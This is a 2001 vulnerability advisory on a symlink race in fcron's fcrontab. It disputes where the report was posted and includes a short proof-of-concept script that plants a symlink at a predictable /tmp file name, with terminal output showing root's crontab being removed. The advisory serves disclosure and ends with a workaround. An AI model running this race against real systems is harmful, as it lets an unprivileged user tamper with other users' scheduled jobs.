Note: The people maintaining www.securityfocus.com claim that i posted this to bugtraq. I didn't. I posted this notice to the securesoftware mailing list instead, since some of my mails to the bugtraq mailing list vanished (it may be that the moderators rejected them without notice, but there also may have been technical problems on their side - in any case this doesn't encourage me to post there).
Here is the the original mail. What securityfocus did with this: page 1, page 2, page 3, page 4, page 5 and page 6.
Exploit (fcronx.c) by _kiss_I didn't write this. The fcronx.c file exploits another problem, but not the one i reported.
Reported to bugtraq by Uwe Ohse <email@example.com> on June 7, 2001.I didn't send this to bugtraq, but to the securesoftware mailing list.
Fcron is a scheduler. It aims at replacing Vixie Cron, so it implements most of its functionalities.
This has been tested on Linux and OpenBSD.
The author has been informed on 2001-05-07. A new release may or may not be available, i was too busy to follow this. In any case the workaround is obvious: make the fcrontab problem only executable for root.
root# ls -l /var/spool/fcron/ total 0 root# echo '0 0 * * * echo test' | fcrontab - 09:53:00 installing file /tmp/fcrontab.27301 for user root Modifications will be taken into account right now. root# ls -l /var/spool/fcron/ total 2 -rw------- 1 root root 110 May 7 09:53 root -rw------- 1 root fcron 20 May 7 09:53 root.orig
uwe$ cat ~/x #! /bin/sh ln -s /var/spool/fcron/rm.root /tmp/fcrontab.$$ exec fcrontab - <<EOF * * * * * false EOF uwe$ ./x 09:55:55 installing file /tmp/fcrontab.27536 for user uwe 09:55:55 User uwe can't read file "/tmp/fcrontab.27536": Permission denied
root# ls -l /var/spool/fcron/ total 3 -rw-r----- 1 uwe fcron 16 May 7 09:55 rm.root -rw------- 1 root root 110 May 7 09:53 root -rw------- 1 root fcron 20 May 7 09:53 root.orig
uwe$ echo '* * * * * true' | fcrontab - 09:59:15 installing file /tmp/fcrontab.27543 for user uwe Modifications will be taken into account at 10h00.
# ls -l /var/spool/fcron/ total 3 -rw------- 1 root fcron 20 May 7 09:53 root.orig -rw------- 1 root root 102 May 7 09:59 uwe -rw-r----- 1 fcron fcron 15 May 7 09:59 uwe.orig